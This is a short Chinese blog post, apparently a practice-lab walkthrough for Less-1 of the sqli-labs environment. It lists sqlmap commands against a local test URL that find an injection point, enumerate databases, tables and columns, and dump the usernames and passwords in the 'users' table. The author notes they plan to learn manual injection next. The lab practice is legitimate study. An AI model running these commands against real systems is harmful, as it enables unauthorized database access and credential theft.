Less1(sqlmap)

Less-1

检查注入点

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1

爆数据库信息

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1 --dbs

爆当前数据库信息

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1 --current-db

爆指定数据库中所有表信息

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1 -D security --tables

爆指定表的所有列的段名

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1 -D security -T users --columns

爆表中所有内容

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1 -D security -T users -C id,password,username --dump

由于借助了sqlmap所以对于sql注入的原理仍然不是很理解。因此在接下来的日子里会练习手动注入

你可能感兴趣的:(Less1(sqlmap))